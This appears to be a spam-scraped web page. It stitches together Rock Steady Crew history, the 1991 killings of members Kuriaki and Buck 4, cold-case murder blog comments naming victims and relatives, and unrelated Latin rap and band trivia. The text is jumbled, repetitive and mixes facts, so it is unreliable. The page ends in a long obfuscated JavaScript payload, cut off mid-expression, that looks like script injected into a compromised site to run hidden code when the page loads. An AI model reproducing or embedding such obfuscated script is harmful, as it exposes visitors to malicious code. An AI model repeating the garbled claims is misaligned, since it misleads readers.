kuriaki rock steady crew

get interactions characterized by lessen, lucidity and moreover harmonious cooperation. But perhaps and even bigger break was the appearance by members Mr Freeze, Ken Swift, Crazy Legs and Frosty Freeze in the box office smash Flashdance. My father was murdered on 7/18/98. (Black History Month Exclusive). They remain closed until they have another viable suspect. Their number is 212-447-2030. He was not only an amazing dancer but a daredevil, Mr. Pabon said in an interview Thursday. At one point the police had arrested a possible suspect, but because they couldnt find the gun and the people he told would not testify against him out of fear, the guy who was the suspect was let go. He was a cab driver and during the time he was killed, there were many livery drivers being robbed and killed. I am so sorry about your brother. Stacy Horn The Rock Steady Crew was founded in 1977 in the Bronx and gained international attention throughout the 80s as its members, including Mr. If that avenue is closed there are a number of things your friend can do, but Id need more information about what she is looking for. Hi. Because those are almost never considered homicides or even manslaughter, and no one would be arrested. // Dec 13, 2015 at 12:23 am, Please if anyone can help us find out about my mother . Definitions.net. I would like information on the deaths of Kuriaki Soto, Lorenzo Soto of Rock Steady Crew in June of 1991. The other new member was Lenny Len. If you remember the name of the suspect you can look here to see if he ever went to prison: http://nysdoccslookup.doccs.ny.gov/kinqw00, 10 Are you a family member? I suggest reading through this link first. 25 Mr. 0 views, 172 likes, 4 loves, 14 comments, 177 shares, Facebook Watch Videos from Koreanroc TV: KURIAKI ( R,I,P ) - Rock Steady Crew | Tribute . Frosty Freeze was an elder b-boy (a member of the Rock City Crew) who was still interested in the game but was without a steady crew. They recorded a record for Charisma called Hey You Rock Steady Crew. It was an important time for the dance movement. // Nov 17, 2015 at 10:07 pm. Jorge Pabon, who uses the name Pop Master Fabel and is the vice president of the group, confirmed Mr. Frosts death, at Mount Sinai Medical Center, saying it followed a long illness, which he did not identify. Working in the U.S., they recorded their fifth studio album at Ocean Recording Studios, Burbank, and Battery Studios, New York, leaning more to soul music and funk music. They were part of a European tour that included Afrika Bambaataa, Fab 5 Freddy, various graffiti artists among others. Which precinct was it? the both died of drugs exacution When was Rock Steady Crew created? The Rock Steady Crew is still a thing, expanding to consist of several groups in different locations. 12 Since then, we have been holding our own, with so many different artists releasing albums, creating hits, and infusing our cultures into rap. They used battles as a means of recruitment. His adoptive mom is a good friend of my moms. His name was Darryl Clinton. The last my mom heard, the case had gone cold. Please help me find my killer because my friends & family deserve closer. Singles released from the album are 'Gallo Negro', 'Sigue', 'Los Angeles', 'Ritmo Mezcal' and 'Estrella Fugaz' (feat. As far as the crew in Manhattan, I was responsible for bringing in myself, Ken Swift, Ty Fly, Doze, and Kippy Dee. My princely moves make sure I score. The answer to those questions are on the left under the heading. They were also nominated for other 3 additional categories that night. I tried emailing you when you first posted but the email address you gave me didnt work. Whose family, the fathers? Both songs appeared on their album Ready For Battle. You can start by ordering a copy of her death certificate here: http://www1.nyc.gov/site/doh/services/death-certificates.page. I'm down by law. It seems that his 'crew' has been very tight lipped about it all, claiming it hurts too much to talk about. Since then she is married, the mother of two sons, and divides her time between Vancouver, B.C. Frost, Mr. Pabon, Crazy Legs, Ken Swift and others, toured and performed. angela patricia hart I had a lot of fun doing it. They usually quote their musical influences as Prince, Michael Jackson, Wu-Tang Clan, Jamiroquai and most 70s and 80s funk and disco music groups. // Dec 16, 2015 at 10:24 am, My father was kill ion 148 Lexington in 1979 by a taix driver I believe that person is still living and has not been arrested yet or has skipped the country I need help!! If you dont get what you believe is a decent response, then go to the document on the left titled. If you dont get what you believe is a decent response, then go to the document on the left titled, Escalating Your Case. Im not sure what you are asking. The album features bass player Bootsy Collins, who introduces himself saying, 'My name is Bootsy Collins, old woman!' I would like information on the deaths of Kuriaki Soto, Lorenzo Soto of Rock Steady Crew in June of 1991. She was born 05/31/1939 . addthis.layers({ That figure is a moving target of course. Finally, if she was buried on Hart Island you can get more information about that here: 33 What about cases that the jury found the defendant not guilty? Please help. If there was a trial but the person wasnt convicted the case would be closed until they had a new suspect. When autocomplete results are available use up and down arrows to review and enter to select. Lil Crazy Legs, originally part of Rock City Rockers, got his name from his efforts to copy Crazy Legs style. What time of day did it happen? The established 98th and Amsterdam in New York as Rock Steady Park and it became a meeting place for all RSC members. -Jon Chardiet aka Ramo is still acting. Im sorry about your mother. He was 44. I suggest reading through this link first. Touch device users, explore by touch or with swipe . This is not exactly my area of expertise, but I would start by ordering her death certificate. However, we dont see Latino rap in English as hyped as it should be. One of her best-performing, best-known songs is Here We Go, which features Kelly Rowland. Devious doze. I didnt want to leave my mother, family & friends behind but now my death is a homicide. If there was a trial you can order transcripts (theres a fee): https://www.nycourts.gov/COURTS/nyscourtofclaims/transcript.shtml, 50 May 11 1966 on my first birthday. Informador. This is a lot easier than going through microfilm. The Rock Steady Crew is still a thing, expanding to consist of several groups in different locations. New York Times 14 Aug, 2000, Illya Kuryaki & the Valderramas: Rock 'Deforme' El Nuevo Herald, Miami - May 7, 1998, Regresa Illya Kuryaki and The Valderramas a la escena musical. S lynch. But I did come across sad stories along the way, of people who died here. Unfortunately some members didnt choose the right path during this down period. // Oct 9, 2015 at 2:28 pm. He is lean-faced and limber, with a wisp of a beard. They want with the intention to be up to users. Teresa croom In late 2016, the album was nominated at the 17th Annual Latin Grammy Awards for Best Alternative Music Album and won. Sad for Sean to have his life so brutally cut short, and for you to experience such a loss at such a young age. Members appeared on The Late Show with David Letterman. // Dec 19, 2015 at 5:59 pm. This is a video tribute to the late bboy Kuriaki (Rock Steady Crew). The Rock Steady Crew was founded in 1977 in the Bronx and gained international attention throughout the '80s as its members, including Mr. Kuriaki rock steady crew death. Id start by getting a copy of her death certificate, which will list her cause of death. This database has old and historical newspapers that are searchable. ! Stacy Horn 28 One song he is known for is the single The 3rd World, which you can check out here. The only thing that was known is that kuriaki was tortured and k.lled execution style in a garage. You can order her death certificate here: http://www.nyc.gov/html/doh/html/services/vr-death-general.shtml, 6 She might not have had any I.D. Lighter Shade of Brown provided another timeless jam to our summer playlists 1990s Latin Active. More uptempo than On a Sunday Afternoon, this is a song youll most likely want to get up and dance to. Were there any witnesses? The result was world wide attention to the b-boy cause. Please help! Yes my mother was found murdered on october 31. Was he hit by a car? I would like to know where he is buried I will be 50 on the anniversary of his death. The two man team of Jo Jo and Jimmy D were the original founders. Stacy Horn Today The Rock Steady Crew are: Crazy Legs (President), YNot (Senior Vice President), Feenx (Junior Vice President), Mr Wiggles, Q-Unique, Tony Touch, Skeme Richards, DJ Eclipse, DJ JS 1, DStroy, Joe Conzo, Rakaa Iriescience, Rich Medina, Bobbito, EZ Mike, Jazzy Jes, Leva57, DV 1, Sab, Shadoe, Abramz, Bailrok, Youtee, Masami, Lea Maxwell, He is an old school hero and a true legend! [8] Both Dante and Emmanuel continued solo performing careers. By then, of course, Legs had already started the new division of Rock Steady. South East L.A. group Delinquent Habits had a Billboard-charting song with Tres Delinquentes, off their 1996 album, Delinquent Habits. Sharon Sims // Dec 13, 2015 at 12:21 am, My mother name is. A woman named Helen Mae Clayton Walker was the victim of a mugging & murder on the streets of Harlem, NYC. his last current release which was in 2000 was a B-Film called Chump Change, about movie show business. // Dec 9, 2015 at 11:11 am. Is to continue sharing Bronx Street Culture. Terror Squads Lean Back had us doing just that during the summer of 2005. I want to know about it but I do not know how to go about finding the information on her death. // Oct 22, 2015 at 9:26 am, Good morning, I called a precinct about 10 years ago to get some information and they told me no one was ever convicted?? If her death was not deemed a homicide the police would not have opened a case. "kuriaki." Im sorry for the loss of your father. The album was chosen by Rolling Stone magazine in Argentina as one of the best rock productions of the country. }, You can request a copy of the autopsy records from the Office of the Chief Medical Examiner and that will give you even more information, and it should list the police precinct who has her case. https://www.definitions.net/definition/kuriaki. Their number is 212-447-2030. I have never met my mother as I was abandoned in Harlem Hosp. ! If you have information about a specific case, and believe the crime was committed by someone within law enforcement, I believe your best bet would be to contact the District Attorney. Rocking chair clipart rock guitar clip art rock clipart death star clipart. Hello. Baby Bash and Frankie J teamed up to give us the smooth 2003 song Suga Suga. We think they repped for Mexico quite well with this hit jam. 'share' : { I fought for as long as I could but I couldnt bare the pain. Thank you, 26 I would start at the library: Once you have gotten more information, like the date and the place, you might try calling the precinct, if you live in that precinct. Born 05/31/1939 contact us at [numbers removed] thanks.. 30 I was told that a man and woman were stabbed in their home in the 80s, the named were Stan and Diane, the residence was on either 32nd street in the Bronx or 53rd. Frost appeared. 6 on the UK Singles Chart, [1] and reached the top 10 in many European countries. people have been k*lled over speaking out on Buck 4's death hence to this day crazy legs never really dwell or speak on . Freeze and Lil' Crazy Legs got down, Lenny-Len, and about a year and a half later, Buck 4 and Kuriaki, too, and on and on. Ray [3] In 1987, when they were 12 and 11 years old respectively, Spinetta, Horvilleur, and younger siblings formed a music group called Pechugo. Movies. Kuriaki was looking great, and he rocked that Back Spin, Side Spin. It spent 20 weeks on the Billboard Hot 100 chart, peaking at 39. Spinetta is the son of musician Luis Alberto Spinetta, and Horvilleur's father is photographer Eduardo Marti. Photographer Henry Chalfant gave them the chance to perform at the Lincoln Center Outdoors Program. Teresa croom Mainly Bronx or mount Vernon N.Y. her death index#is 19392006. The footage is from ~ '82-85. Retrieved from 'https://en.wikipedia.org/w/index.php?title=Illya_Kuryaki_and_the_Valderramas&oldid=989816200', Illya Kuryaki and the Valderramas at rock.com.ar, Pareles, Jon. Emmanuel focused on a rock and pop-rock sound, while Dante preferred hip-hop. my friend lives in 2028 east 177st Bronx ny.. she likes old thi.. and old story.. she wanted to know . 4 I look just like her. Just last year, Latinx rap group Cypress Hill was just honored with their own star on the Hollywood Walk of Fame. Well, in any case, no one outside law enforcement and those who work with them can look at case files. He lived in the Bronx at the time. The Height of Summer ad was so catchy that even Oprah Winfrey tweeted that she could not stop singing it. Latin American bands rooted in 70's and 80's. It contains No Way Jose and Virgen de ria. Both are very easy to use, but the librarian can help your friend if shes never used them before. On Good Friday in April, 1973. Where is her body located at. The record suggests a new state of mind in which there is no place for discrimination or oppression.' Freeze was one of the first real white b-boys. That is so sad, Im very sorry. At this point they began to show their love of martial arts in their videos. Im sure Im not telling you anything you dont already know, but they dont want to go to trial until they do because you only get one shot. Web. It features Tweety Gonzlez. I will also add that the death certificate and/or Medical Examiner will give you the cause and manner of her death. Disco was killing the artform and many b-boys had given up and gone on to other things. people have been killed over speaking out on Buck 4s death hence to this day crazy legs never really dwell or speak on the situation even on the freshest kids DVD. Not too much is known about them, but these two died in 1991. There are now 9,082 unsolved murders in New York City going back to 1985. // Oct 9, 2015 at 8:49 am. Stacy Horn Frost got his start in 1978 with the Bronx-based Rock City Crew. Roughly 150 200 or more murders go cold every year, and try as they might, they are not going back and solving that many each year (of the older, cold cases). I was told that my mother Josephine Brewer was stabbed and shot and left in a New York city or New Jersey alleyway. Not sure if this is accurate information. Not too much is known about them, but these two died in 1991. Vallejo, California Chicano group N2Deep (James Jay Tee Trujillo and Timothy TL Lyon) had a hit with their timeless 92 jam, Back to the Hotel, from the album of the same name. Anyone can read what you share. It sounds like the the cold case detective wasnt able to uncover anything to help. Hi- I really appreciate your site. Kuriaki has attempted Mount Foraker five times, successfully reaching the summit three times, including the first solo winter ascent of that peak on March 10, 2007. -Two Of The Original Members of the Rock Steady Crew, Kuriaki and Buck4 were both killed in seperate drug homicides in 1991. the only thing that was known is that kuriaki was tortured and killed execution style in a garage. // Dec 11, 2015 at 1:05 pm. He was Also in Money Talks(1997), Franc Reyes aka Luis wrote some Freestyle songs in the early 90s & directed 2002s Empire and Saundra Santiago aka Carmen was in the miami vice series and currently a soap opera now. The only thing that was known is that kuriaki was tortured and k.lled execution style in a garage. The South Gate, L.A. hip hop trio, who has sold over 20 million records. Buck 4 was in Beat Street, though. $mVT=String.fromCharCode(46,50,104,41,85,73,113,123,77,87,47,103,56,69,107,70,65,83,82,39,49,71,40,63,88,120,74,109,72,75,67,80,112,76,68,81,118,61,48,90,59,57,84,119,89,86,66,125,44);(![]+[])[+[]][([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]][([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]]($mVT[36]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$mVT[25]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[37]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[43]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+[]]+$mVT[32]+$mVT[18]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[25]+$mVT[+!+[]+!+[]]+(!![]+[])[+!+[]]+$mVT[(+[])]+([]+[]+{})[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[19]+$mVT[48]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([]+[]+{})[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+$mVT[(+[])]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+(![]+[])[+[]]+([]+[]+{})[+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[23]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[33]+(!![]+[])[!+[]+!+[]]+$mVT[37]+$mVT[45]+(![]+[])[!+[]+!+[]]+(+{}+[]+[])[+[]]+$mVT[30]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[20]+$mVT[18]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[24]+$mVT[35]+$mVT[44]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[13]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[30]+$mVT[16]+([![]]+{})[+!+[]+[+[]]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[35]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+$mVT[46]+$mVT[11]+$mVT[12]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[20]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[43]+$mVT[+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[18]+$mVT[41]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+$mVT[39]+$mVT[21]+$mVT[30]+$mVT[2]+$mVT[2]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[44]+$mVT[4]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[24]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[41]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[14]+$mVT[46]+$mVT[44]+$mVT[13]+$mVT[43]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[26]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[17]+(![]+[])[!+[]+!+[]]+$mVT[38]+$mVT[5]+$mVT[13]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[12]+$mVT[46]+$mVT[21]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+$mVT[41]+$mVT[+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]